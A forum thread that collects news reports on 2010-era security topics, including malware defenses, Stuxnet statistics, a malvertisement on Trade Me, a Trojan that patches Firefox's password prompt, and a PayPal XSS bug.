18 total posts
Symantec counters malware threat with Ubiquity
Symantec is stepping up its fight against malware with the introduction of a next-gen platform dubbed "Ubiquity."
Ubiquity - which analyzes the anonymous software usage patterns of more than 100 million Symantec-shielded PCs - allows the security company to more effectively protect against micro-distributed, mutating threats.
"Ubiquity adds a new layer of protection that bolsters [our] existing [defenses], such as intrusion prevention, [as well as] behavioral and heuristic detection capabilities," explained Symantec senior VP Stephen Trilling.
"[Now], traditional protection [methods] require [an initial] capture and analysis of specific strains of malware. [But] Ubiquity takes a fundamentally different approach to help [secure] infrastructure from the [latest] and most targeted threats."
According to Trilling, Ubiquity operates by formulating a security rating for each file based on specific (anonymous) user-generated data - including origin, age, adoption patterns and other proprietary calculations.
New Versions of Websense Defensio Automatically Remove...
Malicious Content from Business and Celebrity Social Networking Sites
About 40 percent of Facebook posts contain links and about 10 percent of those posts are either malicious or spam. That puts the average Facebook user one click away from malware a few times each day. And even though individual pages are being targeted, more risk comes from high-volume corporate and celebrity pages. Websense, Inc. (NASDAQ: WBSN), a global leader in unified Web, data and email security, is now offering an expanded suite of Defensio 2.0? security services for businesses and celebrities. Defensio 2.0 reduces security, productivity, and legal liability risks by analysing and classifying user-generated content that is posted to corporate and personal Websites, blogs, user forums, and social networking sites.
The technology also enhances the real-time threat intelligence of Websense products, including the industry-leading Websense Web Security Gateway. Defensio, the security eyes and ears of Facebook and the blogging world, analyses more than 2.5 million comments and tens of millions of URLs weekly. The sweeping Web 2.0 threat detection and analysis conducted by Defensio is then incorporated into all Websense solutions, which are powered by the Advanced Classification Engine and the Threatseeker Network. As a result, Websense customers are protected from emerging threats and malicious content before they spread beyond the social Web and are addressed by traditional security offerings. Websense is the only security vendor able to integrate into its security solutions the threat intelligence captured behind the closed doors of private social networks?where many threats first emerge, incubate, and spread.
The Defensio 2.0 service is based on technology acquired in 2009 and is in use today in a free, personal version by more than 25,000 Facebook and blog users. The free personal version is still available, but Websense now offers new specific versions that address the needs of smaller and larger companies and celebrities.
Symantec now manages Apple iOS and Google Android smartphone
Symantec today announced that its mobile device management software now supports Apple iOS and Google Android, via Microsoft's Enterprise ActiveSync protocol, which both platforms support. The release is part of an expanded push by the security vendor to eventually deal with the wide range of mobility threats.
Symantec is developing for future release an agent for iOS and Android. The agent will give enterprise IT groups greater and more detailed control over how employees can use these handsets. It already has similar agents for Windows Mobile and RIM BlackBerry OS.
Also in development are products aimed at mobile carriers. These new applications, scheduled for announcement in a few weeks, will give carriers more visibility into mobile traffic and more control over the threats to their cellular subscribers, according to Jon Kuhn, director of product management for Symantec's Enterprise Security Group.
The mobile OS support added to Symantec Mobile Management Version 7.0 (released late in 2009) creates a security management application that can work across several of the most popular mobile platforms. A growing number of companies no longer standardize on just one mobile OS, though the degree to which they support different OSs varies with the platform, requirements, applications and available third-party tools.
Data Shows Iran No Longer A Stuxnet Hotspot
Kaspersky Lab released its malware statistics report for September. Buried among the data on the top malware detected on users' machines and being pushed from malicious Web sites is an interesting factoid: Iran no longer ranks as a Stuxnet hotspot, while India continues to struggle with the effects of the sophisticated virus.
The data, compiled from systems running Kaspersky's security software, isn't authoritative and represents just a slice of infected systems in the countries in question. However, it suggests that Stuxnet - a sophisticated virus that is believed to have been a targeted attack against Iran's uranium enrichment facilities - is no longer prevalent in that country. India, which has registered the most Stuxnet infections, continues to struggle to eradicate the virus, Kaspersky's data suggests.
We've been hearing for a while that Iran was taking aggressive steps to contain the Stuxnet virus. India has been the epicenter of Stuxnet infections since it was first detected, with Iran the country with the third most infections. The number of reported infections in Iran has steadily decreased during that time. Kaspersky Lab researcher Aleks Gostev wrote on September 26 that Iran was doing a good job cleaning systems infected by the virus. He predicted, then, that the country would soon cease to be one of the centers of the epidemic. Data from Kaspersky's September report appears to confirm that prediction.
Also see: http://forums.cnet.com/7726-6132_102-5002725.html
Trade Me says update to avoid malvertisements
Only users with out-of-date browsers, Oses and antivirus affected by malware, auction site says
Online marketplace Trade Me was targeted by cybercriminals on Thursday and Friday last week.
In a statement, Trade Me notes: "A malicious advertisement purporting to be for Lonely Planet was detected on the site on Thursday and Friday. This ?malvertisement? is a combination of malicious software and advertising, where cybercriminals use an online advertisement to distribute malicious software.
"If a member viewed the advertisement with an out-of-date browser or operating system, and had out-of-date anti-virus software, they may have been invited to download a program purporting to be ?anti-virus? software. Only users that downloaded this malicious software will have been affected.
"Trade Me advised its members of the issue with the advertisement via a blog announcement and posts on the Trade Me message boards on Friday."
Trade Me spokesman Paul Ford said the company was aware of five people that had downloaded the malicious software and had their computers affected. ?As soon as we became aware of the attack we took down the advertising tile and advised our members. So far 47 members have contacted us however most of those have not been affected,? Ford says.
The statement continues: "The vast majority of Trade Me members will not have seen the advertisement or received the invitation to download the infected software.
Top reason for Facebook unfriending: Too many useless posts
University of Colorado Denver researcher says politics, religion can also result in Facebook unfriending by social network users
The No. 1 reason why friends dump friends on Facebook is when they get fed up seeing too many useless posts, according to new research out of the University of Colorado Denver Business School.
Posts about polarizing subjects such as politics and religion as well as inappropriate and racist comments also sever many Facebook relationships, according to Christopher Sibona, a PhD student in the Computer and Science and Information Systems program.
"Researchers spend a lot of time examining how people form friendships online but little is known on how those relationships end," said Sibona, whose research will be published in January by the Hawaii International Conference on System Sciences. "Perhaps this will help us develop a theory of the entire cycle of friending and unfriending." [...]
Sibona surveyed more than 1,500 Facebook users to get to the bottom of why people dump each other. Not surprisingly, people who flood others with posts are at great risk of being unfriended.
"The 100th post about your favorite band is no longer interesting," he said.
The study showed that 57% of people unfriended as a result of online actions and that those who make friend requests are more at risk of being suddenly unfriended.
Sibona found mixed reactions by those who have been unfriended, largely dependent upon who did the deed and why.
While millions have enjoyed reconnecting with old friends and meeting new ones on Facebook, the social network has also brought with it many headaches, including those perpetrated by malware writers and other scammers.
FCC May Confront ISPs on Bot, Malware Scourge
The Federal Communications Commissions (FCC) may soon kickstart a number of new initiatives to encourage Internet service providers to do a better job cleaning up bot-infected PCs and malicious Web sites on their networks, KrebsOnSecurity has learned.
Earlier this year, the commission requested public comment on its ?Cybersecurity Roadmap,? an ambitious plan to identify dangerous vulnerabilities in the Internet infrastructure, as well as threats to consumers, businesses and governments. On a couple of occasions over the past few weeks I had an opportunity to chat with Jeffery Goldthorp, associate bureau chief of the FCC?s Public Safety & Homeland Security Bureau, about some of the ideas the commission is considering for inclusion in the final roadmap, due to be released in January 2011.
Goldthorp said there are several things that the commission can do to create incentives for ISPs to act more vigorously to protect residential users from infections by bot programs.
Voice-routing call fingerprint system fights 'vishing'
Security researchers in the States say they have developed a cunning new method of "fingerprinting" voice calls that could offer a route to trustworthy caller ID and a barrier against so-called "vishing" or voice phishing.
The tool is called PinDr0p, and works by analysing the various characteristic noise artifacts left in audio by the different types of voice network - cellular, VoIP etc. For instance, packet loss leaves tiny gaps in audio signals, too brief for the human ear to detect, but quite perceptible to the PinDr0p algorithms. Vishers and others wishing to avoid giving away the origin of a call will often route a call through multiple different network types.
?There?s a joke: ?On the Internet, no one knows you?re a dog'. Now that?s moving to phones,? says Mustaque Ahamad of the Georgia Institute of Technology. ?The need is obvious to build security into these voice systems ... PinDr0p needs no additional detection infrastructure; all it uses is the sound you hear on the phone.?
According to the system's inventors, there's no way for vishers or other voicey villains to eliminate the traces a given system of call routing leaves in the audio eventually received at the other end. [...]
The PinDr0p research was funded by the US National Science Foundation. There's a statement on it here.
Qualys Acquires Nemean Networks
Qualys, a provider of security vulnerability assessment services, has acquired a research firm that specializes in detecting malware on websites.
The acquisition of Nemean Networks will be the basis for adding new capabilities to the Qualys lineup in 2010 that will be more focused on actual security protection in addition to providing vulnerability scans.
Nemean Networks has developed an intrusion-detection system and a ******** system that provides visibility into attacks on websites ? and there already are more than 1 million sites infected with malware. With the acquisition, Qualys said the first order of business will be to work with the security community to develop intrusion-detection system signatures that can be applied to Snort and other open source security tools.
Why a "Sandbox" Makes Adobe Reader More Secure
Adobe released a major security update for Adobe Reader and Acrobat yesterday--a week ahead of the quarterly release scheduled for next Tuesday. At the same time, Adobe provided a glimpse at how "sandboxing" in the upcoming Adobe Reader Protected Mode will help prevent exploits even when vulnerabilities exist.
The out-of-band update from Adobe fixes a whopping 23 vulnerabilities in Acrobat and Reader. Most of the vulnerabilities are critical, and at least one has been actively exploited in targeted PDF attacks for a month or more.
Adobe has recognized that the cross-platform, ubiquitous nature of its products has made it a primary target for exploits and malware, and it has taken steps to improve coding practices and develop inherently more secure software. However, it is unreasonable to expect that Adobe--or any other developer--can create impenetrably secure software, so other defenses are needed to shield off attacks.
Enter "sandboxing". A post from Kyle Randolph on the Adobe Secure Software Engineering Team (ASSET) blog defines the concept. "A sandbox is a security mechanism used to run an application in a confined execution environment in which certain functions (such as installing or deleting files, or modifying system information) are prohibited. In Adobe Reader, "sandboxing" (also known as "Protected Mode") adds an additional layer of defense by containing malicious code inside PDF files within the Adobe Reader sandbox and preventing elevated privilege execution on the user's system."
The ASSET blog post also explains some of the limitations of the sandboxing approach.
BLADE Software Eliminates "Drive-By Downloads" from...
Insecure Web browsers and the growing number of complex applets and browser plug-in applications are allowing malicious software to spread faster than ever on the Internet. Some websites are installing malicious code, such as spyware, on computers without the user?s knowledge or consent.
These so-called ?drive-by downloads? signal a shift away from using spam and malicious e-mail attachments to infect computers. Approximately 560,000 websites -- and 5.5 million Web pages on those sites -- were infected with malware during the fourth quarter of 2009.
A new tool that eliminates drive-by download threats has been developed by researchers at the Georgia Institute of Technology and California-based SRI International. BLADE -- short for Block All Drive-By Download Exploits -- is browser-independent and designed to eliminate all drive-by malware installation threats. Details about BLADE were presented today at the Association for Computing Machinery?s Conference on Computer and Communications Security.
Facebook unveils changes to enhance privacy
Facebook on Wednesday rolled out new features designed to make people feel more comfortable putting photos, videos, and other personal data online.
In a blog post, CEO Mark Zuckerberg unveiled an overhauled version of Facebook Groups that allows users to share certain content with select people, rather than with everyone listed as a friend. Vacation photos, for instance, might be shared only family members and a team rosters might be shared only with other members of one's Fantasy Football league. It was one of three features Zuckerberg announced.
?We've heard loud and clear that you want more control over what you share on Facebook ? to manage exactly who sees it and to understand exactly where it goes,? Zuckerberg wrote. ?With this new Groups experience and the other tools we're rolling out today, we're taking a few important steps forward towards giving you precise controls.?
Also unveiled was a new dashboard that tells users at a glance how various Facebook apps are using their data. The panel shows all the apps a user has authorized, what data they use and when the data was last accessed. [...]
Facebook will begin rolling out the features later on Wednesday.
Microsoft Suggests Public Health Response for Sick PCs
When your sick PC connects to the Internet and starts distributing malicious spam and propagating worms and viruses to other vulnerable systems, it impacts all who share the Internet. Microsoft's Scott Charney proposes a novel approach to addressing that issue, suggesting that we treat infected devices as we do infected people.
Many organizations have already adopted some form of network access protection (NAP). NAP solutions analyze the security configuration and posture of a given system before allowing it to connect to network resources. If the user account password is too simple, or the personal firewall is disabled, or the antimalware software is not up to date, the device is redirected to a safe site that explains the baseline security requirements and provides links to get the computer compliant, or simply bans the computer from connecting.
Consumers, however, make up a significant percentage of the computers sharing the Internet, and with no IT admin or computer security team overseeing things the odds of compromise or infection are higher. Consumers view computers as an appliance--on par with the TV or microwave or an automobile. They simply want them to work and perform the tasks they were designed to perform without requiring some sort of advanced knowledge and constant monitoring.
In a blog post related to his proposal, Charney spells out the problem, "commonly available cyber defenses such as firewalls, antivirus and automatic updates for security patches can reduce risk, but they're not enough. Despite our best efforts, many consumer computers are host to malware or are part of a botnet. "Bots," networks of compromised computers controlled by hackers, can provide criminals with a relatively easy means to commit identity theft and also lead to much more devastating consequences if used for an attack on critical government infrastructure or financial systems."
Patchy Phisher Forces Firefox to Forego Forgetting Passwords
Every browser can, at the user?s discretion, be set up to remember passwords. In general, Webroot advises most users not to set the browser to store login credentials, because they?re so easily extracted by password-stealing Trojans like Zbot. In Firefox, for example, you can click Tools, Options, then open the Security tab, and uncheck a box that tells the browser to remember passwords entered into Web forms. (The box is checked by default.)
But in the course of taking a more thorough look at a Trojan that came to our attention in July, we were surprised to see the Trojan modify a core Firefox file. Upon closer inspection, the Trojan patches a file named nsLoginManagerPrompter.js. The patch adds a few lines of code (displayed above), and comments-out other portions of code, that dictate whether Firefox prompts the user to save passwords when he or she logs into a secure site.
Before the infection, a default installation of Firefox 3.6.10 would prompt the user after the user clicks the Log In button on a Web page, asking whether he or she wants to save the password. After the infection, the browser simply saves all login credentials locally, and doesn?t prompt the user. [...]
One thing that we, nor any other AV company, can do is fix the modified Firefox file. However, there?s an easy fix for that as well: Simply download the latest Firefox installer and install it over the top of your existing installation. You won?t lose any bookmarks or add-ons, and the installer will just overwrite the modified nsLoginManagerPrompter.js file. Problem solved.
Microsoft Security Essentials available to SMBs tomorrow
From Microsoft's Windows Security Blog:
We announced back in September that Microsoft Security Essentials would be changing its licensing terms and would soon become available to small business on up to 10 PCs. We are happy to announce that beginning tomorrow, October 7, the change will go into effect and small business owners will be able to download and install Microsoft Security Essentials. This new availability will allow small businesses that operate outside of the home to take advantage of Microsoft?s no-cost antimalware service that will help them save time, save money and remain productive while protecting them from viruses, spyware and other malicious threats. If you operate a small business with more than 10 PCs, we do recommend that you consider using the Forefront line products to address your security needs.
Reports of rogue ESET Smart Security malware
We have received reports of a rogue security software program disguised with a false ESET Smart Security image.
This type of infiltration is known as scareware, which claims to be legitimate security software but is actually malware itself.
ESET does not advertise security software by installing anything to your computer. Current ESET customers who suspect an infection on their computer should visit the following ESET Knowledgebase article:
I think my computer has a virus ? what should I do?
If you are a customer of another security vendor besides ESET and have the rogue Smart Security malware on your computer, follow the steps in the ESET Knowledgebase article linked above, substituting your current security software in steps 3 and 4, or contact your security software vendor.
If you are not a customer and you currently do not have security software, visit our Free Antivirus Utilities page to run the ESET Online Scanner and to use our Spyware Removal and Antivirus Tools.
Hackable Bug Found On PayPal.com
A new XSS (cross site scripting) vulnerability was identified on Paypal.com earlier today, found by a researcher who goes by the name d3v1l and disclosed on both Security-Shell and XSSed. That bug would allow a malicious hacker to insert code on the site that could potentially be used to access a user?s account.
The problem, technically, is found in the parameter sender_country in a transaction called nvpsm. NVP is Paypal?s API for Merchants to use when interacting with the Paypal web site, it stands for Name-Value Pair. SM is short for ?send money?. A problem such as this can be used to capture a user?s session (essentially log in as that user) and perform privileged actions (money transfers) as that user, as well as send a user a valid Paypal URL but then redirect them to a malicious third party site (phishing, malware, etc.).